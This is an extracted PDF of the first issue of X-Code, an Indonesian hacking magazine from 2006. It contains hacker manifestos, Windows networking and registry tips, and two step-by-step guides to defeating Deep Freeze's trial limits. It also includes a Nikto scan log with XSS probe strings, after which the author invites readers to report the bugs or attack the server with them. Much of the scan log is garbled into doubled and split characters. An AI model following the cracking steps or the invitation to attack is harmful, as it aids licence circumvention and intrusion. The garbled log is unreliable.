September 13, 2022 | Author: Anonymous | Category: N/A
Download Buku Belajar Komputer Hacker PDF...
X-Code Magazine On White paper No. 1 - Date : 23 April 2006
X-CODE Magazine Magazine X-CODE
X-Code Licensi for all article article | | Computer • Internet • Hacking
Cara memeriksa keamanan webserver dengan NIKTO
Tehnik manual hacking local root on Fedore Core 2
Pemograman perl sudah banyak digunakan, bahkan anda pengguna windowspun dapat menggunakan pemograman ini, ayo periksa keamanan webserver anda dengan Nikto! ( ► Halaman 8) 8)
Keamanan linux ahkir-ahkir ini semakin mengkhawatirkan, segera update linux anda, di magazine ini ditampilkan tutor untuk hack local root yang kebetulan dicoba di Fedora Core 4 (► Halaman 39 39))
http://yogyafree.net | http://forum.yogyafree.net | | http://milis.yogyafree.net http://milis.yogyafree.net http://yogyafree.net | http://forum.yogyafree.net
X-Code Magazine dari redaksi Apa itu Majalah X-Code : - X-Code magazine adalah majalah komputer, internet dan hacking dengan bahasa Indonesia dengan penggunaan Media Murni PDF. Latar belakang X-Code Magazine : - Kebutuhan akan informasi, artikel, hacking dan tutor semakin banyak sehingga Komunitas memutuskan memutuskan untuk merilis sebuah magazine untuk komunitas IT di Indonesia. Tujuan : - Memberikan / sharing / berbagi artikel untuk perkembangan ilmu komputer, internet dan hacking di Indonesia. Misi : - Menyebarkan ilmu-ilmu komputer, internet dan hacking untuk tujuan positif. Hak cipta / Licensi : - Seluruh materi X-Code Magazine dapat didownload, dibaca, dimodifikasi serta disebarkan secara bebas untuk tujuan buk bukan an komersial (no (nonprofit), nprofit), dengan syarat tidak menghapus atau merubah atribut penulis. - Hak cipta di tangan penulis dan X-Code Magazine dengan mengikuti licensi GPL (General Public License) Distribusi X-Code Magazine : - Web Yogya Family Code 2007 : http://www.yogyafree.net. http://www.yogyafree.net. - Mailing list X-Code : http://milis.yogyafree.net http://milis.yogyafree.net / /
http://groups.yahoo.com/group/yogyafree http://groups.yahoo.com/group/yogyafree. . - Forum phpBB X-Code : http://forum.yogyafree.net http://forum.yogyafree.net / / http://familycode.phpbbweb.com. http://familycode.phpbbweb.com. - Friendster X-Code :
[email protected] [email protected] /
[email protected].
[email protected]. - CD Yogyafree Pro 7a atau yang lebih baru. - Komunitas dan instansi lain yang bekerja sama dengan X-Code Magazine. Contact : X-Code Magazine - Alamat E-mail Redaksi :
[email protected] [email protected] - Kota Yogyakarta
Kata pengantar Pembaca X-Code Magazine yang sedang baca ☺ Majalah X-Code ahkirnya diterbitkan juga untuk pertama kalinya setelah 1 Tahun 10 bulan Komunitas Yogyafree / Yogya Family Code / X-Code berdiri, memang bukan waktu yang singkat mendirikan komunitas hingga membersnya jauh melebihi target kami baik di Milis ( http://milis.yogyafree.net http://milis.yogyafree.net ) ) ataupun di http://forum.yogyafree.net ). ). forum ( http://forum.yogyafree.net Di X-Code Magazine No 1 ini atau bisa dibilang versi perdana diharapkan dapat membantu kualitas isi X-Code Magazine lebih baik untuk di nomor-nomor selanjutnya, di waktu ke depan kita harapkan Majalah ini menjadi pusat majalah komputer, internet dan hacking di dunia maya maupun di dunia nyata yang didistribusikan secara gratis sehingga dapat memacu kami untuk memberikan yang lebih baik dan lebih baik lagi. Kami segenap team redaksi mengucapkan selamat membaca.
Redaksi X-Code Magazine Team X-Code
Daftar Isi : 1. Apakah Kamu hacker ? – Terjemahan oleh oleh ^rumput_kering^ - Hal 1 2. Selamat datang disisi kami - Terjemahan oleh oleh ^rumput_kering^Hal 2 3. KELEMAHAN PADA DEEP FREEZE STANDARD 5.20 TRIAL VERSION oleh ^rumput_kering^ - Hal 4 4. Membuat deepfreeze trial menjadi full (hacking Deepfreeze) oleh Luckyy_man – Hal 6 5. Memeriksa keamanan webserver dengan NIKTO oleh ^family_code^ Hal 8 6. Menghubungkan internet melalui LAN dengan Windows XP oleh ^family_code^ - Hal 11 7. Konfigurasi Windows Secara Manual Memakai Regedit oleh ^rumput_kering – Hal 13 8. Belajar membuat program penampil text dengan bahasa Assembler oleh ^family_code^ - Hal 18 Belajar membuat link website dengan Turbo Basic oleh 9. ^family_code^ - Halprogram 21 10. Belajar membuat program pilihan dengan Turbo Pascal oleh ^family_code^ - Hal 24 11. Belajar membuat program tampil sederhana dengan C++ Builder oleh ^family_code^ - Hal 27 12. Belajar membuat program kamus dengan C++ Builder oleh ^family_code^- Hal 30 13. Tips dan triks IRC oleh ^family_code^ - Hal 32 14. Tehnik hacking local root on Fedore core 2 oleh dokter^cinta – Hal 39 15. Fungsi windows API oleh PushM0v – 47 16. Diary.Exe, Apa dan Bagaimana? oleh PushM0v - Hal 52 17. Implementasi Teknik Stealth Pada Virus oleh PushM0v - Hal 57 18. Connect Back melalui Bug CGI oleh PushM0v – Hal 72 Penulis X-Code Magazine : - ^rumput_kering^ - ^family_code^ - Luckyy_man - dokter^cinta - PushM0v
Dari RedDragon di IRC, untuk para newbies...
Apakah Kamu Hacker?
Buatlah sebuah pertanyaan kecil untukku hari ini. Katakan jika kamu cocok dengan deskripsi di bawah ini. kamu mendapatkan net account beberapa bulan yang lalu. kamu sudah surfing di internet, dan kamu bercanda di banyak media yang melaporkan informasi superhighway. kamu telah mempunyai red box, kamu tidak perlu membayar untuk menelepon. Kamu mempunyai crackerjack, dan kamu telah menjalankannya di file password pada sebuah unix dan kamu mendapatkan tentang sebuah komputer, account. Semua orang di sekolahmu orang salut dengan pengetahuanmu kamu adalah satu-satunya yang diminta gurumu untuk membantunya. Apakah kamu seperti itu? kamu bukanlah seorang hacker. Ada ratusan orang sepertimu di luar sana. Kamu membeli 2600 dan kamu bertanya. kamu membaca phreack dan kamu bertanya. kamu bergabung dengan #hack dan kamu bertanya. kamu menanyakan semua pertanyaan, dan bertanya apa yang salah dengan itu? Intinya, untuk menjadi hacker adalah bertanya tentang sesuatu, benar begitu? Semua yang kamu ingin tahu adalah jawaban dari pertanyaanmu. Kamu bukanlah hacker. Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban. jika kamu membutuhkan bantuan, jangan bertanya untuk mendapatkan jawaban, bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri. Karena bukanlah seseorang yang memiliki jawaban yang disebut hacker, tetapi orang yang melakukan perjalan sepanjang jalan. -RedDragon Diterjemahkan oleh ^rumput_kering^ ^rumput_kering^ dari Hacker's Toolkit ver.2.0 dengan judul asli "are you a hacker".
1
Selamat datang di sisi kami
Hacker... ...sebuah kata yang aneh... Apakah sebenarnya hacker itu? Saya pikir setiap setiap hacker punya definisinya sendiri-sendiri, kami semua punya alasannya... Saya adalah seorang hacker karena saya ingin tahu, Saya ingin melanjutkan ke tahap berikutnya, saya ingin tahu bagaimana ini bekerja, Saya ingin mengerti, Saya tidak ingin dibatasi oleh sebuah sistem keamanan, saya ingin semuanya gratis, Saya tidak ingin merusak keamanan, saya ingin mengambil tantangan, untuk menjadi lebih baik setiap hari. Hackers tahu bagaimana caranya untuk menjadi berbahaya... Tujuan kami hanyalah Pengetahuan, dan karena Pengetahuan adalah Kekuatan, kami dianggap berbahaya. Tetapi kami tidak berbahaya, kami punya Kode Etik, kami menghormati aturan. Hanya riffraff (saya tahu apa artinya :P, red)materi. yang ingin mencuri, menyalahgunak menyalahgunakan an atautidak memerasmu untuk keuntungan Kamu tidak perlu berpikir yang menakutkan, kami tidak ingin menyerangmu tanpa alasan yang baik untuk melakukannya. Kami bukanlah orang gila, kami tidak menyebabkan kerusakan hanya untuk kesenangan. Ya beberapa hackers adalah pencuri, mereka hanya menghack hanya untuk mencuri uang atau keuntungan material. saya tidak suka orang yang seperti ini, mereka adalah penyakit. Menurutku, kami sangat berguna. Kami membantu orang-orang untuk memperkuat sistem keamanan, kami ingin
2
para administrator melakukannya. Di sisi lain, kami adalah user, sama sepertimu. Kami sangat berguna, karena kami mempunyai mempunyai pandangan, pandangan untuk melihat apa yang tak terlihat orang lain, pandangan dimana tidak ada sesuatu untuk dijual. Pandangan ini berbeda dari yang lain, saat mereka berkata padamu bawah privasi bernilai jutaan dolar, kami berkata padamu bahwa mereka menjual privasimu untuk bayaran berupa emas, saat mereka berkata kepadamu bahwa sistem itu aman, kami berkata tidak kepadamu. Dengarkan kami, bukan kewajibanmu untuk percaya kepada kami, tapi bukalah pikiranmu, tanyalah kepada dirimu sendiri mana yang benar. Apakah kamu pernah berpikir bahwa semua komputer berasal dari source yang sama? Mereka ingin kamu membenci kami, untuk takut kepada kami. jangan percayai mereka, mereka, percaya atau tidak, cobalah untuk mengerti... mengerti... Jadi, habiskan beberapa menit dengan kami, ambil waktu untuk belajar, untuk melihat sesuatu dari mata kami... ...segala sesuatunya akan terlihat berbeda. Selamat datang di sisi kami, sisi dimana banyak yang ingin tahu.
ArthXerXes
Diterjemahkan oleh ^rumput_kering^ dari Hacker's Toolkit ver2.0 dengan Welcome to our side ". judul asli " Welcome
3
KELEMAHAN PADA DEEP FREEZE STANDARD 5.20 TRIAL VERSION
Program Deep Freeze Standard 5.20 Trial version memiliki masa trial 60 hari. Setelah melewati 60 hari, program tersebut tidak akan berjalan. Bisa dilihat pada toolbar Deep Freeze terlihat tanda silang berkedip-kedip . Jika tanggal pada komputer dinaikkan melebihi 60 hari maka program tersebut tidak akan berfungsi. Tetapi jangan merubah tanggal di dalam Windows karena Deep Freeze sudah mendisable layanan untuk merubah tanggal.
Lalu bagaimana caranya? Masuklah ke dalam BIOS, rubah tanggalnya misalkan 18 Maret 2015. Wekekekekek lama amat. Setelah itu booting Windows anda. Masuk ke System Configuration Utility dengan cara klik START – Run, ketik msconfig lalu klik OK. Klik tab Services, disable servis DF5Serv. Klik OK. Buka Windows Task Manager (tekan CTRL+ALT+DEL) lalu klik tab Processes dan matikan 2 proses Deep Freeze yang sedang berlangsung (Penulis lupa namanya apa tapi jika anda melihatnya pasti anda akan segera tahu karena namanya mirip dengan “ Deep Freeze”) dengan cara menyorot namanya lalu klik End Task. Sekarang program Deep Freeze tidak akan berjalan saat startup walaupun tanggalnya dikembalikan seperti semula. semula. Nggak percaya? Coba aja sendiri! :) Bagaimana jika saya ingin menjalankan program Deep Freeze lagi? Anda tinggal mengenable service DF5Serv pada System Configuration Utility (msconfig). Terus kalau saya ingin mencegah orang lain melakukan cara di atas? Berilah password BIOS anda.(walaupun pasti ada cara buat membo membobol bol passwordny passwordnyaa :p) Sekian tutori tutorial al pendek dari saya. Semoga bisa membantu admin mengamankan komputernya bukan malah membantu cracker untuk untuk merusak komputer.
Peringatan: Jangan menghapus file Persi0.sys di direktori Windows dan atau menghapus direktori Faronics\Deep Freeze karena akan menyebabkan Deep Freeze akan berjalan tanpa bisa dikendalikan walaupun masa trialnya telah habis. “Ilmu ibaratkan sebuah pisau, semakin sering diasah maka akan semakin tajam, jika digunakan digunak an de dengan ngan benar maka menjadi be bergunalah rgunalah pisau itu itu.. Tet Tetapi api jika digunakan untuk melukai orang lain, maka menjadi hinalah pisau itu .” 4
Thanks to : kesempata n untuk bernafas. - ALLAH SWT yang telah memberi aku kesempatan - Kedua ortuku yang mengasihi aku sejak kecil. - Tomatku yang paling aku sayang “Yunandha Setyaningrum” @ Pakem, tetaplah menjadi Air Penyejukku. Kang Kurniawan yang pertama kali mengenalkan aku kata “HACKER” hingga membuatku menjadi seperti sekarang. - Kang Sarkun yang mengenalkan aku sama System Tray Iconnya Deep Freeze. Tanpa dirimu aku tak akan menulis tutorial ini =)) - Semua saudaraku (X-Code) sedunia, we are a big family. - Seseorang di depan layar yang sudi merelakan waktunya untuk membaca katakata ini. Have a nice day ;-)
Yogyakarta, 4 April 2006 ^rumput_kering^
5
Membuat deepfreeze trial menjadi full (hacking Deepfreeze)
1. Download dulu Deepfreeze trial di www.faronics.com www.faronics.com 2. Install deepfreeze 3. Setelah itu download NTFS4DOS di - http://www.datapol.de/dpe/freeware/ http://www.datapol.de/dpe/freeware/ - http://www.wsdownload.de/download/ntfs4dos/ http://www.wsdownload.de/download/ntfs4dos/ntfsinst.exe ntfsinst.exe 4. Terus install ntfsinst.exe nya hingga jadi boot disk NTFS4DOS 5. Terus buka shift ctrl alt F6 --> buat di p posis osis boot thawed 6. Restart komputer, dan booting pake NTFS4DOS 7. Tunggu sampai masuk di Drive C:\ --> kemudian copy Persi0.sys ke D:\Persi0.sys.thawed D:\Persi0.sys.thawe d (boot thawed) 8. Kemudian masuk windows lagi, terus buat posisi Deepfreeze di boot frozen. 9. Restart komputer, dan booting pake NTFS4DOS 10. Tunggu sampai masuk di Drive C:\ --> kemudian copy Persi0.sys ke D:\Persi0.sys.frozen D:\Persi0.sys.fro zen (boot frozen) langkah ini membuat back up Persi0.sys.thawed untuk boot thawed Persi0.sys.frozen Persi0.sys.froze n untuk boot frozen 11. Bila mau menghilangkan Trial nya, tinggal copy kan aja, jgn lupa yg file asli C:\Persi0.sys di delete, terus di ganti D:\copy Persi0.sys.thawed c:\ # ini utk posisi boot thawed --> setelah itu restart D:\copy Persi0.sys.frozen Persi0.sys.frozen c:\ # ini utk posisi boot frozen --> setel setelah ah itu restart
6
12. Kemudian anda coba, copy Persi0.sys.frozen ke Drive C, kemudian reboot, masuk windows, terus buat file di Drive C:\ kemudian anda restart, bila file nya hilang berarti anda sudah berhasil, sebalikanya bila mau install file, delete dulu C:\ Persi0.sys.frozen , setelah itu baru copy Persi0.sys.thawed. Selamat mencoba, penulis tidak bertanggung jawab atas kerusakan sistem komputer anda :) di tulis ulang oleh luckyy_man #awali #indolinux #indoopenbsd DALNET :)) bila kurang jelas, refrensi http://www.governmentsecurity.org/archive/t123.html http://www.governmentsecurity.org/archive/t123.html
7
Memeriksa keamanan webserver dengan NIKTO Sebenarnya sudah bukan rahasia lagi webserver APACHE sering mendapat serangan dibandingkan webserver lainnya, disini penulis akan menunjukkan cara memeriksa keamanan webserver APACHE anda dengan NIKTO disertai pengujian keamanannya Jika anda sudah menginstall ActivePerl ke komputer anda, maka masuk ke C:\Perl\Bin jika anda menginstall ke drive C dan D:\Perl\Bin jika anda menginstall di drive D, lalu Download Nikto, dengan masuk ke alamat url http://smg-familycode.co.nr/nikto.zip http://smg-familycode.co.nr/nikto.zip,, disini tutor ini penulis mengextractnya ke D:\Perl\Bin\nikto-1.35 setelah itu kita masuk MS-DOS, lalu masuk ke directory D:\Perl\Bin\nikt D:\Perl\Bin\nikto-1.35. o-1.35.
Setelah itu untuk melihat source nikto.pl maka gunakan perintah : edit nikto.pl dengan begitu anda bisa melihat source lebih rapi dibandingkan di notepad, setelah itu kita kembali ke MS-DOS untuk menjalan source nikto ini. Sekarang kita siapkan target, disini kita install saja PHPTriad setelah itu kita jalankan APACHE-nya, lalu masuk ke browser kita masukkan url http://localhost. Ok, Webserver sudah aktif, kita kembali yang Nikto tadi, setelah kembali ke MSDOS prompt penulis masukkan perintah perl nikto.pl -h localhost di D:\perl\bin\nikto-1.35. Hasil : 8
D: \ per l \ bi n\ ni kt o- 1. 35>per l ni kt o . pl - h l oc a all hos t - ***** SS SSL L su up pport not avai l abl e (s ee docs f or SSL i ns tal l i ns tr ucti ons ) ***** --------------------------------------------------------------------------- Ni kto 1 1.. 35/ 1. 34 - www. ci r t . net + Tar get I P: 127. 0. 0. 1 + Ta Tarr get Hostna ostnam me: l oca ocall host + Tar get Port : 80 + Star t Ti me: Sun Sun J an 29 17 17:: 05 05:: 15 20 2006 06 --------------------------------------------------------------------------- Scan Scan i s de dep pende enden nt on "Se "Serr ve verr " st r i ng whi ch ca can n b be e f ak aked ed,, use - g to ove overr r i de + Ser Ser ve verr : Apach ache/ e/ 1. 3. 14 ( Wi n32) - Ret r i ev eved ed X- Pow Powered- By h hea eade derr : PHP/ 4. 0. 5 + Al l owed HTTP Met hods: GET, HEA EAD D, POST, OPTI ONS, TR TRAC ACE E + HTT TTP P method ' TR TRA ACE' i s t ypi ypi cal l y o onl nl y u used sed f or de debu bugg ggii ng. ng. I t sho shoul ul d be di sab sabll ed ed.. OSVD SVDB87 877. 7. + PHP/4. 0. 5 a ap ppea earr s t o b be e o ou ut dat ed ( cur cur r en entt i s at l ea east st 5. 0. 3) + Apach ache/ e/ 1. 3. 14 appe appears ars t o b be e o ou ut dated ( cur cur r ent ent i s at l ea east st Apach ache/ e/ 2. 0. 54) . Apac he 1 1.. 3. 33 i s st i l l mai nt ai ned a an nd co con nsi dered secu securr e. + Apa pache che// 1. 3. 14 ( Wi n3 n32) 2) - Apa pache che 1. 3 be bell ow 1. 3. 29 are vu vull ne nerr ab abll e t o ov overf erf l ows i nmod od_r _r ewr i t e an and d mod_c od_c gi . CAN- 20 2003 03-- 05 0542 42.. + Apach ache/ e/ 1. 3. 14 ( Wi n32) - Apach ache e 1 1.. 3 b bel el ow 1. 3. 27 a arr e v vu ul nerabl erabl e to a l oc ocal al buf f er over over f l ow whi ch al l ows att acke ackerr s t o ki l l an any y p prr oce ocess ss on t he syst em. CAN- 2002 2002-- 0839 0839.. + Apa pache che// 1. 3. 14 (Wi n3 n32) 2) - Apa pache che 1 1.. x up 1. 2. 34 are vul ne nerr abl abl e t o a r emot e D DoS oS and and po possi ssi bl e cod code e ex execu ecutt i on. on. CAN- 20 2002 02-- 03 0392 92.. + / php/ php. exe xe?c: ?c: \ boot . i ni - The The A Ap pache che co con nf i g al l ows p ph hp. exe t o b be e ca cal l ed di r ec ectt l y. ( GET ET)) + / - TRA TRACE op optt i on ap appe pears ars t o a all l ow XSS or cr ed eden entt i al t hef t . See ht t p: / / www. cg cgii secu securr i t y. co com m/ whi t ehat - mi r r or/ Whi t ePa Pap per_scr een. pdf f or detai l s ( TRA TRACE) + / i nd ndex. ex. ph php?= p?=PH PHPB PB8B 8B5F2 5F2A A0- 3C 3C92 92-- 11 11d3 d3-- A3A 3A99- 4C 4C7B 7B08 08C C10 1000 000 0 - PHP PHP r eve eveal al s pot pot en entt i al l y sensi t i ve i nf ormat i on vi a ce cerr t ai n HTT TTP P r eq eque uest st s whi ch con contt ai n spe speci ci f i c QUER ERY Y st r i ng ngs. s. OSV SVD DB- 1218 12184. 4. ( GET ET)) + / i nd ndex. ex. ph php?= p?=PH PHPE PE95 9568 68F34 F34-- D42 4288- 11 11d2 d2-- A76 7699- 00 00A AA00 001A 1AC CF42 - PH PHP P r eve eveal al s pot pot en entt i al l y sensi t i ve i nf ormat i on vi a ce cerr t ai n HTT TTP P r eq eque uest st s whi ch con contt ai n spe speci ci f i c QUER ERY Y st r i ng ngs. s. OSV SVD DB- 1218 12184. 4. ( GET ET)) + / i nd ndex. ex. ph php?= p?=PH PHPE PE95 9568 68F35 F35-- D42 4288- 11 11d2 d2-- A76 7699- 00 00A AA00 001A 1AC CF42 - PH PHP P r eve eveal al s pot pot en entt i al l y sensi t i ve i nf ormat i on vi a ce cerr t ai n HTT TTP P r eq eque uest st s whi ch con contt ai n spe speci ci f i c QUER ERY Y st r i ng ngs. s. OSV SVD DB- 1218 12184. 4. ( GET ET)) + / i nd ndex. ex. ph php?= p?=PH PHPE PE95 9568 68F36 F36-- D42 4288- 11 11d2 d2-- A76 7699- 00 00A AA00 001A 1AC CF42 - PH PHP P r eve eveal al s po pott en entt i al l ysensi t i ve i nf ormat i on vi a ce cerr t ai n HTT TTP P r eq eque uest st s whi ch con contt ai n spe speci ci f i c QUER ERY Y st r i ng ngs. s. OSV SVD DB- 1218 12184. 4. ( GET ET)) + / i ndex ndex.. php?m hp?mod odu ul e=My_eGal l ery - My_e y_eG Gal l ery pri or t o 3 3.. 1. 1. g a arr e vu vull ner ner abl abl e t o a remote execut exe cut i on bu bug g v vii a S SQ QL command and i nj ect i on. on. ( GET ET)) + / i ndex. php?t op_messa essag ge=&l t ; scri pt > ; al er t ( docum cument . co cook okii e)&l e)&l t ; / scri pt > ; - Le Led d- Fo Forr ums al l ows an any y u user ser t o ch chan ange ge t he wel come messag essage, e, an and d i t i s vu vull ne nerr ab abll e t o Cr Cr oss Si t e Scr i pti ng ( XSS). CA- 2000-02 000-02.. ( GET) + / phpi nf o. php?VA ?VARI ABLE LE= =al ert ( ' Vul nerab erabll e' ) - Con ontt ai ns PHP co con nf i gur at i on i nf ormati on an and d i s vu vull nerab erabll e t o Cr oss Si t e Scr i pti ng ( XSS SS)) . CA- 200 2000-02 0-02.. ( GET) ET) + / phpi hpi nfo. php - Cont ont ai ns PHP confi confi gur ati on i nfor mati on ( GET) + / phpm hpmyad yadmi n/ - Thi Thi s mi ght be i nter esti ng. ng. . . ( GET ET)) + hpM hp yAd Th miegh be is nter ng ET)) + // p te sM t yA / d - miTn h/i s - mThi i gihs t b i tnt e re es t i ngesti . . . (ng. G.E.T.) ( GET + / i ndex ndex.. php?ba hp?base= se=t est%20 - Thi Thi s mi ght be i nter esti ng. ng. . . has b bee een n seen seen i n web l o gs f r om an un unkno know wn scan scanne nerr . ( GET ET)) + / i ndex ndex.. php?I hp?I DAdmi n=t est - Thi Thi s mi ght be i nter esti ng. ng. . . has b bee een n seen seen i n web l og ogs s f r om an unkno unknow wn scanner. ( GET) + / i nd ndex ex.. ph php?p p?pym ymembs=adm admi n - Th Thii s mi ght ght be i nter est i ng ng.. . . ha has s be been en see seen n i n web l og ogs s f r om an unkno unknow wn scanner. ( GET) + / i ndex ndex.. php?Sq hp?Sqll Query=t est%20 - Thi Thi s mi ght be i nt erest i ng. . . has b bee een n seen seen i n web l og ogs s f r om an un unkno know wn scann scanner er . ( GET ET)) + / i nd ndex ex.. ph php?t p?t ampon= pon=t est %20 - Th Thii s mi ght ght be i nter est i ng ng.. . . ha has s b bee een n see seen n i n web l og ogs s f r om an unkno unknow wn scanner. ( GET) +/ i nd ndex ex.. ph php?t p?t op opii c=& l t ; scr i pt& pt&am amp; gt; al ert ( do docum cumen entt . coo cooki ki e)&am e)& l t ; / scr i pt& pt&am amp; gt; %20 - Th Thii s mi gh ghtt be i nter est i ng ng.. . . ha has s be been en see seen n i n web l og ogs s f r om an un unkn know own scan scanne nerr . ( GET) ET) + 25 2563 63 i t ems check checked ed - 19 i t em( s) f ou ound nd on r emote host ( s) + En End d Ti me: Su Sun n J an 2 29 9 17 17:: 09 09:: 54 20 2006 06 ( 27 279 9 secon seconds) ds) --------------------------------------------------------------------------+ 1 hos t( s ) t es ted
9
Selanjutnya terserah anda ingin memberitahukan bugnya kepada admin atau ingin menyerang webserver dengan bug yang sudah tampil diatas, selamat mencoba.
Penulis : Kurniawan / ^family_code^
10
Menghubungkan internet melalui LAN dengan Windows XP
Dengan tutorial ini diharapkan penulis dapat membantu para netter yang ingin membuat jaringan internet dikos, dirumah atau dik dikantor, antor, dim dimana ana didalam Windows XP semuanya serba mudah & cepat yang tentu saja anda dapat mempraktekkannya sendiri tutorial ini, tulisan ini penulis buat setelah penulis mengconnectkan komputer penulis dengan komputer sebelah yang sudah terkoneksi dengan internet agar komputer penulis juga bisa menerima layanan internet seperti yang didapat komputer sebelah, dan komputer sebelah saya beri nama komputer tujuan didalam tutorial ini. Bagaimana caranya ? Sebenarnya caranya tidak begitu rumit dimana untuk langkah pertama pastikan dahulu komputer kamu dengan komputer tujuan sudah terkoneksi LANnya
caranya laludan search lalu pilih pilihan computer people setelah itu langsungpilih pilihstart search, pastikan disitu komputer tujuanorname computernya terlihat dan bisa dimasuki (tershare). Untuk bisa terkoneksi kita harus mensetting kedua komputer tersebut yaitu komputer kita dan komputer tujuan. Setting di komputer kita Pilih Start lalu lalu Control Panel, lalu pilih Network Connections, lalu pilih set up a home or small office network, setelah next dan next kita akan dihadapkan pada pilihan Select the statment that best describes this computer segera pilih pilihan :
11
( ● ) This computer connects to the internet through another computer on mynetwork or through a resedential gateway
Setelah kita pilih next untuk berikutnya pastikan bahwa workgroup dengan komputer tujuan sama yang tentu saja juga jangan lupa jangan sampai nama computer sama dengan computer tujuan, hehe setelah itu ikutin aja alurnya dan selesai deh. Setting di komputer tujuan Pilih Start lalu lalu Control Panel, lalu pilih Network Connections, lalu pilih set up a home or small office network, setelah next dan next kita akan dihadapkan pada pilihan Select the statment that best describes this computer segera pilih pilihan :
( ● ) This computer connects ddirectly irectly to the internet. Th Thee other computers on my network connect to the internet through this computer.
Setelah kita pilih next untuk berikutnya yakinkan bahwa workgroup dengan komputer kita sama yang tentu saja juga jangan lupa jangan sampai nama computer sama dengan computer kita, hehe lagi nich :P setelah itu ikutin aja alurnya dan selesai deh.
Penulis : Kurniawan / ^family_code^
12
Konfigurasi Windows Secara Manual Memakai Regedit
Tutorial di bawah ini adalah hasil explorasi saya terhadap program XSetup Pro. Sebenarnya anda bisa dengan mudah mengkonfigurasi Windows memakai program XX-Setup Setup Pr Pro, o, tetapi bagi yang ingin me mengetahui ngetahui caranya secara manual bisa menggunakan tutorial ini. Saat membuatnya saya menggunakan Windows XP SP 2, jadi jika ada perbedaan key value di dalam register anda, anda bisa membuatnya sendiri. Tetapi sebagai catatan ada juga register yang khusus untuk Windows versi tertentu saja. Menggunakan Regedit 1. Membuka Regedit Klik Start – Run lalu ketik regedit pada kotak isian Open lalu klik OK 2. Membuat dan menghapus Key Klik kanan icon folder pada tree yang di dalamnya ingin dibuat key baru lalu klik New - Key dan beri nama sesuai yang anda inginkan. Jika anda ingin menghapusnya klik key yang dimaksud lalu tekan tombol Delete. Pilih yes pada kotak dialog yang muncul 3. Membuat dan merubah dan menghapus String Klik key di mana di dalam key tersebut akan dibuat string. Klik kanan di sembarang tempat pada jendela sebelah kanan. Klik New – String Value
lalu nama string tersebut. Untuklalu merubah nama string lagi klik kanan padaberi nama string yang dimaksud klik rename dan ubah namanya. Jika ingin merubah datanya, double klik pada nama string yang dimaksud, masukkan data lalu klik OK. Jika anda ingin menghapusnya klik string yang dimaksud lalu tekan tombol Delete. Pilih yes pada kotak dialog yang muncul. Cara diatas juga bisa digunakan untuk DWORD, Binary, Multi-String dan Expendable String. Menghilangkan Apllet "Add/Remove Program" di Dalam Control Panel 1. Masuk ke HKCU\Control Panel\Don't Load\ 2. Buat string baru dengan nama addwiz.cpl 3. Ganti datanya menjadi 1
Apllet yang lain juga bisa diganti dengan cara hanya saja dengan nama string berbeda sesuai dengan aplletyang yangsama dimaksud. Tetapi ada 13
beberapa apllet yang tidak bisa dihilangkan. Di bawah ini adalah contoh beberapa nama apllet. 1. Accessibility = access.cpl 2. Add/Remove Program = appwiz.cpl 3. Automatic Updates = wuaucpl.cpl 4. Display properties = desk.cpl 5. Firewall 6. Game Controllers & Joysticks 7. Hardware 8. Internet Settings 9. Mail 10. Modem & Telephones 11. Mouse Control 12. Network Setup Wizard 13. ODBC 14. Power Management 15. Regional options 16. Security Center
= firewall.cpl = joy.cpl = hdwwiz.cpl = Inetcpl.cpl = mlcfg32.cpl = telephon.cpl = main.cpl = NetSetup.cpl = odbccp32.cpl = powercfg.cpl = intl.cpl = wscui.cpl
17. Sound and Audio = mmsys.cpl 18. Speech = sapi.cpl 19. System = sysdm.cpl 20. Time and Date = timedate.cpl 21. UPS = ups.cpl 22. User/Passwords Properties = nusrmgr.cpl Setiap komputer kadang-kadang memiliki apllet yang berbeda di dalam Control Panel. Jika apllet yang di inginkan tidak ada di dalam daftar, anda bisa melakukan pencarian dengan menjalankan Search... pada harddisk lalu ketik *.cpl. Agar apllet yang dimaksud bisa muncul kembali, hapus string yang bersangkutan yang telah dibuat tadi. Memunculkan Shortcut ke Suatu Drive D: Saat Klik Kanan My Computer 1. Masuk ke HKCR\CLSID\{20D04FE0-3AEA-1069-A2D808002B30309D}\Shell\ 2. Buat key baru dengan nama XQXSETCMD1\ 3. Ubah value data pada string bernama (default) dengan Drive D: 4. Buat key baru pada HKCR\CLSID\{20D04FE0-3AEA-1069-A2D808002B30309D}\Shell\XQXSETCMD1\ 08002B30309D}\Shell\XQXSETCMD 1\ dengan nama Command 5. Ubah value data pada string bernama (default) dengan letak explorer.exe berada diikuti dengan D:\. Biasanya explorer.exe berada di C:\Windows\explorer.exe. C:\Windows\explo rer.exe. (Contoh: C:\Windows\explorer.exe C:\Windows\explorer.exe D:\) 6. Jika ingin membuat 2 shortcut maka buatlah String baru dengan nama XQXSETCMD2 pada HKCR\CLSID\{20D04FE0-3AEA-1069-A2D808002B30309D}\Shell\ lalu ulangi langkah nomor 3 sampai 5. Jika ingin
14
menghilangkan menghilangk an shortcut hapuslah key XQXSETCMD1 Mengganti Nama My Computer pada Desktop 1. Buka HKCU\Software\ HKCU\Software\Windows\CurrentVe Windows\CurrentVersion\Explorer\CLS rsion\Explorer\CLSID\ ID\ 2. Buat key baru dengan nama {20D04FE0-3AEA-1069-A2D8-08002B30309D} 3. Ganti data value pada string (default) dengan nama komputer yang anda
inginkan Membuat My Computer Special Folder Jika saat menggunak menggunakan an explorer anda merasa kerepotan karena folder yang ingin dibuka di dalam folder lain, di bawah ini akan ditunjukkna cara membuat folder spesial. Folder ini akan muncul pada explorer di bawah Control Panel 1. Buka HKLM\SOFTWARE\ HKLM\SOFTWARE\Classes\CLSID\ Classes\CLSID\ 2. Buat key baru bernama {55028DEA-EA62-4c5f-A1F3-9D123DFAEDA1} 3. Pada string (Default) ganti data valuenya dengan nama folder yang anda inginkan 4. Buat string baru bernama InfoTip lalu ganti data valuenya dengan komentar tentang folder tersebut
